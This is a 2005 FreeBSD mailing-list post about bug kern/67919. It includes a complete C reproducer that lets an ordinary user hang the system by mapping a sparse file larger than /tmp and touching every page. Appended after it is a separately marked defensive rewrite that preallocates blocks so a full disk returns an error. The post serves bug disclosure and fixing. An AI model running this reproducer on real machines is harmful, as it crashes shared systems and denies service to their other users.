From owner-freebsd-current@FreeBSD.ORG Mon Oct 31 10:59:58 2005
Message-ID: <2b22951e0510302128q571a3c1se111262e88ae19bb@mail.gmail.com>
Date: Sun, 30 Oct 2005 21:28:22 -0800
From: "Cai, Quanqing" <caiquanqing@gmail.com>
To: freebsd-current@freebsd.org, bug-followup@FreeBSD.org
Cc: Edwin Groothuis, Igor Sysoev, Uwe Doering
Subject: Re: kern/67919: Why nobody take serious to fix this bug?
Today I happened to read this message on freebsd-stable:
http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html

After I read all the messages and related links, I feel so frustrated: why does nobody take fixing this bug seriously, even though we have a patch for it? I can reproduce this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! The system stops responding, so I have to power cycle it. The patch made by Uwe Doering actually works well. This bug looks like a security hole to me :( If you guys don't like this patch, please give a reason and come up with a better patch or solution.

For the impatient, you can run this to crash your system (7.x, 6.x, 5.x); you have to increase FILELEN to a size greater than your /tmp partition:

======================================================================
#include <sys/types.h>
#include <sys/mman.h>
#include <err.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

#define FILENAME "/tmp/test"   /* where to put the test file */
#define FILELEN  710           /* test file length in MB */

int
main(void)
{
	int fd;
	size_t len;
	char *buf, *p, *lim;

	/* cast first so a large FILELEN does not overflow int arithmetic */
	len = (size_t)FILELEN * 1024 * 1024;

	/* create the file, then extend it to len bytes as a sparse file:
	 * no disk blocks are allocated yet */
	if ((fd = open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) == -1)
		err(2, "open() failed");
	if (ftruncate(fd, len) == -1)
		err(2, "ftruncate() failed");

	/* map the whole sparse file shared and writable; the fd is no
	 * longer needed once the mapping exists */
	buf = mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0);
	if (buf == MAP_FAILED)
		err(2, "mmap() failed");
	(void)close(fd);

	/* touch one byte per page: every write faults in a page that the
	 * kernel must back with a block on /tmp, which runs out of space
	 * once FILELEN exceeds the partition */
	for (p = buf, lim = p + len; p < lim; p += 4096)
		*p = '0';

	if (munmap(buf, len) == -1)
		err(2, "munmap() failed");
	exit(0);
}
======================================================================

Cai, Quanqing
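The reproducer above lets page faults allocate the backing blocks of a sparse file, which is exactly where the hang occurs once /tmp fills. The following is an added example, not code from the report or from FreeBSD: it shows the same mmap-and-touch pattern written so that a full filesystem surfaces as an ordinary ENOSPC error before any page is mapped. The blocks are allocated up front with explicit write(2) calls (newer systems also offer posix_fallocate(2); plain writes are used here for portability), the file is created with mkstemp(3) rather than a fixed world-writable name, and an advisory statvfs(3) check refuses obviously oversized requests. The function names free_bytes, preallocate_blocks and checked_mmap_touch are assumptions for illustration.

```c
/* Added example, not part of the original report or of FreeBSD. Allocates
 * every block of the file before mapping it, so a full filesystem is
 * reported by write(2) as ENOSPC instead of being hit inside a page fault.
 * Function names here are assumptions chosen for this illustration. */
#include <sys/mman.h>
#include <sys/statvfs.h>
#include <sys/types.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define PAGE 4096

/* Bytes an unprivileged user may still allocate on the filesystem of dir. */
static long long free_bytes(const char *dir)
{
	struct statvfs sv;

	if (statvfs(dir, &sv) == -1)
		return -1;
	return (long long)sv.f_bavail * (long long)sv.f_frsize;
}

/* Write zeros over [0, len) so no sparse hole remains. Returns 0, or -1
 * with errno set; a full filesystem shows up here as ENOSPC from write(2). */
static int preallocate_blocks(int fd, size_t len)
{
	static const char zeros[PAGE];	/* zero-initialised by the C runtime */
	size_t done = 0;

	if (lseek(fd, 0, SEEK_SET) == -1)
		return -1;
	while (done < len) {
		size_t want = len - done < PAGE ? len - done : PAGE;
		ssize_t n = write(fd, zeros, want);

		if (n == -1) {
			if (errno == EINTR)
				continue;
			return -1;
		}
		done += (size_t)n;
	}
	return 0;
}

/* Create a len-byte file under dir, map it shared, and touch one byte per
 * page, as the report's program does. Returns the number of pages touched,
 * or -1 with errno set. The statvfs check is only advisory (another process
 * may fill the disk in between); preallocate_blocks() is the real guard. */
static long checked_mmap_touch(const char *dir, size_t len)
{
	char path[4096];
	char *buf, *p;
	long pages = 0;
	long long avail = free_bytes(dir);
	int fd, saved;

	if (avail == -1)
		return -1;
	if ((unsigned long long)len > (unsigned long long)avail) {
		errno = ENOSPC;
		return -1;
	}
	snprintf(path, sizeof path, "%s/mmap-test.XXXXXX", dir);
	if ((fd = mkstemp(path)) == -1)
		return -1;
	unlink(path);			/* the file lives only as long as fd */

	if (preallocate_blocks(fd, len) == -1)
		goto fail;
	buf = mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0);
	if (buf == MAP_FAILED)
		goto fail;
	close(fd);
	fd = -1;
	/* every page already has a block behind it, so these faults never
	 * need to allocate anything on the filesystem */
	for (p = buf; p < buf + len; p += PAGE, pages++)
		*p = '0';
	if (munmap(buf, len) == -1)
		return -1;
	return pages;

fail:
	saved = errno;
	if (fd != -1)
		close(fd);
	errno = saved;
	return -1;
}

int main(int argc, char **argv)
{
	size_t mb = argc > 1 ? (size_t)strtoul(argv[1], NULL, 10) : 1;
	long pages = checked_mmap_touch("/tmp", mb * 1024 * 1024);

	if (pages == -1) {
		perror("checked_mmap_touch");
		return 1;
	}
	printf("touched %ld pages\n", pages);
	return 0;
}
```

Run with the size in megabytes as the first argument; asking for more than /tmp can hold returns an error from the statvfs pre-check or from write(2) rather than faulting pages on a full filesystem.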